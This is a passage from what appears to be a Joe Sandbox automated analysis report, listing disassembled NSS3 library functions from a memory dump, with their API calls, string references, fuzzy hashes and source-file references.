                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: free.MOZGLUE(D958E836,?,6C48B1EE,2404110F,?,?), ref: 6C48AB49
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(5D5E6C68), ref: 6C48AB5C
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: free.MOZGLUE(5D5E6C5C), ref: 6C48AB63
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C48AB6F
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C48AB76
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C48DCFA
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6C48DD0E
                                                                                                                                                                                                                                                      • PK11_IsFriendly.NSS3(?), ref: 6C48DD73
                                                                                                                                                                                                                                                      • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C48DD8B
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C48DE81
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C48DEA6
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C48DF08
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 519503562-0
                                                                                                                                                                                                                                                      • Opcode ID: 645683326e1885176028d8363355449212e70c1d0c082ddff2e501810e8de2b6
                                                                                                                                                                                                                                                      • Instruction ID: c477bc6eb0bde857e6f873ce927cc66269ff2c27293b168c7154314a734d1f3a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 645683326e1885176028d8363355449212e70c1d0c082ddff2e501810e8de2b6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB91C1B5A031069FDB00CF68C881FAAB7B1BF44309F15406ADD199BB41EB31E945CBE1
                                                                                                                                                                                                                                                      Function 6C445FC0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 230COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000293F4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,6C52BB62,00000004,6C594CA4,?,?,00000000,?,?,6C4031DB), ref: 6C4460AB
                                                                                                                                                                                                                                                      • sqlite3_config.NSS3(00000004,6C594CA4,6C52BB62,00000004,6C594CA4,?,?,00000000,?,?,6C4031DB), ref: 6C4460EB
                                                                                                                                                                                                                                                      • sqlite3_config.NSS3(00000012,6C594CC4,?,?,6C52BB62,00000004,6C594CA4,?,?,00000000,?,?,6C4031DB), ref: 6C446122
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C446095
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C4460A4
                                                                                                                                                                                                                                                      • misuse, xrefs: 6C44609F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_config$sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
                                                                                                                                                                                                                                                      • API String ID: 1634735548-648709467
                                                                                                                                                                                                                                                      • Opcode ID: 049c9f86206a4363b9f0bfed3d3d25b7c4c8f3c3e6e160a6e10a200ca2d9d02d
                                                                                                                                                                                                                                                      • Instruction ID: f19dfd8c2b7f196edfcf9398216481dbf5d158f40870e7b4ac5c2d1c0c82e3c6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 049c9f86206a4363b9f0bfed3d3d25b7c4c8f3c3e6e160a6e10a200ca2d9d02d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4B13CB4A04A4ACFDB04CF58C641DA9B7F0FB1E305B16815DD509BB322E770AB85CB99
                                                                                                                                                                                                                                                      Function 6C3F4F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3F4FC4
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3F51BB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3F51A5
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C3F51B4
                                                                                                                                                                                                                                                      • unable to delete/modify user-function due to active statements, xrefs: 6C3F51DF
                                                                                                                                                                                                                                                      • misuse, xrefs: 6C3F51AF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_logstrlen
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
                                                                                                                                                                                                                                                      • API String ID: 3619038524-4115156624
                                                                                                                                                                                                                                                      • Opcode ID: 60ae28029dd65691297d2f51aeed834e1572fef1fb538865fad3d7ac7542d472
                                                                                                                                                                                                                                                      • Instruction ID: d6c9d745711ec3f597a7a815b94d87e3252105d721e74d2a03f44a9d7ac037ca
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60ae28029dd65691297d2f51aeed834e1572fef1fb538865fad3d7ac7542d472
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D719E7160420A9BEF00CE55CD80BDA77B9BF48318F148924FD299BB41D336E952CFA1
                                                                                                                                                                                                                                                      Function 6C4DFF10 Relevance: 10.7, APIs: 7, Instructions: 164memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000400,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFF4B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFF6F
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFF81
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFF8D
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFFA3
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,6C4DF165,6C5A219C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4DFFC8
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4E00A6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Alloc_ArenaArena_memset$EncodeFreeItem_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 204871323-0
                                                                                                                                                                                                                                                      • Opcode ID: 6e01963b8b5a1f770751c9d0298e322bed6b12d63577e84e9eaa07da02fdb99b
                                                                                                                                                                                                                                                      • Instruction ID: 9d582f45deeca7c388feba0f76b7891f67c551d244e252a8bd9d9f8a19e4a395
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e01963b8b5a1f770751c9d0298e322bed6b12d63577e84e9eaa07da02fdb99b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E511371E012559FDB21CE98D890FAEB7B1BB4931AF660229DD65A7B40D731AC008BD1
                                                                                                                                                                                                                                                      Function 6C49DEF0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C49DF37
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C49DF4B
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49DF96
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C49E02B
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C49E07E
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C49E090
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C49E0AF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Error$Unlock$CriticalEnterSectionValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4073542275-0
                                                                                                                                                                                                                                                      • Opcode ID: 9704c4c8a8c6f29bc0e6dcbd896dfe5bc2707d6d71c02a2130f56e40924afd4a
                                                                                                                                                                                                                                                      • Instruction ID: 429f43923db7f0e27948bcce0a3da69ca4f4eb8277ccffe3ad8dc9af2c8af21a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9704c4c8a8c6f29bc0e6dcbd896dfe5bc2707d6d71c02a2130f56e40924afd4a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3651BD35A00620CFEB20DE24DC85F667BB5BB44319F204528E85A47F91E732E849CBD2
                                                                                                                                                                                                                                                      Function 6C4BAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C4BAB3E,?,?,?), ref: 6C4BAC35
                                                                                                                                                                                                                                                        • Part of subcall function 6C49CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C49CF16
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C4BAB3E,?,?,?), ref: 6C4BAC55
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C4BAB3E,?,?), ref: 6C4BAC70
                                                                                                                                                                                                                                                        • Part of subcall function 6C49E300: TlsGetValue.KERNEL32 ref: 6C49E33C
                                                                                                                                                                                                                                                        • Part of subcall function 6C49E300: EnterCriticalSection.KERNEL32(?), ref: 6C49E350
                                                                                                                                                                                                                                                        • Part of subcall function 6C49E300: PR_Unlock.NSS3(?), ref: 6C49E5BC
                                                                                                                                                                                                                                                        • Part of subcall function 6C49E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C49E5CA
                                                                                                                                                                                                                                                        • Part of subcall function 6C49E300: TlsGetValue.KERNEL32 ref: 6C49E5F2
                                                                                                                                                                                                                                                        • Part of subcall function 6C49E300: EnterCriticalSection.KERNEL32(?), ref: 6C49E606
                                                                                                                                                                                                                                                        • Part of subcall function 6C49E300: PORT_Alloc_Util.NSS3(?), ref: 6C49E613
                                                                                                                                                                                                                                                      • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C4BAC92
                                                                                                                                                                                                                                                      • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C4BAB3E), ref: 6C4BACD7
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6C4BAD10
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C4BAD2B
                                                                                                                                                                                                                                                        • Part of subcall function 6C49F360: TlsGetValue.KERNEL32(00000000,?,6C4BA904,?), ref: 6C49F38B
                                                                                                                                                                                                                                                        • Part of subcall function 6C49F360: EnterCriticalSection.KERNEL32(?,?,?,6C4BA904,?), ref: 6C49F3A0
                                                                                                                                                                                                                                                        • Part of subcall function 6C49F360: PR_Unlock.NSS3(?,?,?,?,6C4BA904,?), ref: 6C49F3D3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2926855110-0
                                                                                                                                                                                                                                                      • Opcode ID: 82241a5dca83bb2d683eb1d19acc12e52411a5db0dd0de307b3f2219535ac007
                                                                                                                                                                                                                                                      • Instruction ID: e5c3672a96360c1ee85c41b8b9d198667f4bc5e18be6a721e9f53991e0af4443
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82241a5dca83bb2d683eb1d19acc12e52411a5db0dd0de307b3f2219535ac007
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 893126B1E006155FEB00DE698C40DAF7B76AF84328B19812CE819AB740EB31AD0597F1
                                                                                                                                                                                                                                                      Function 6C498C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_Now.NSS3 ref: 6C498C7C
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DC6
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DD1
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C539DED
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C498CB0
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C498CD1
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C498CE5
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C498D2E
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C498D62
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C498D93
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3131193014-0
                                                                                                                                                                                                                                                      • Opcode ID: 90082df8ded69e48e751f6394466a5436d4a4a28ff14d51e3d1da299b0d88b61
                                                                                                                                                                                                                                                      • Instruction ID: cba4450bdd4d825cd769908b14c79650ad8be9e97cf332eeb2196fff2715c3c4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90082df8ded69e48e751f6394466a5436d4a4a28ff14d51e3d1da299b0d88b61
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE313771A01221ABE700DF68DC44FAABB70BF55318F24023AEA1967B60D771B954C7C1
                                                                                                                                                                                                                                                      Function 6C4D9D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C4D9C5B), ref: 6C4D9D82
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C4D9C5B), ref: 6C4D9DA9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D136A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D137E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: PL_ArenaGrow.NSS3(?,6C46F599,?,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?), ref: 6C4D13CF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: PR_Unlock.NSS3(?,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D145C
                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C4D9C5B), ref: 6C4D9DCE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D13F0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: PL_ArenaGrow.NSS3(?,6C46F599,?,?,?,00000000,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C4D1445
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008,6C4D9C5B), ref: 6C4D9DDC
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C4D9C5B), ref: 6C4D9DFE
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C4D9C5B), ref: 6C4D9E43
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C4D9C5B), ref: 6C4D9E91
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C4CFAAB,00000000), ref: 6C4D157E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C4CFAAB,00000000), ref: 6C4D1592
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1560: memset.VCRUNTIME140(?,00000000,?), ref: 6C4D1600
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1560: PL_ArenaRelease.NSS3(?,?), ref: 6C4D1620
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1560: PR_Unlock.NSS3(?), ref: 6C4D1639
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
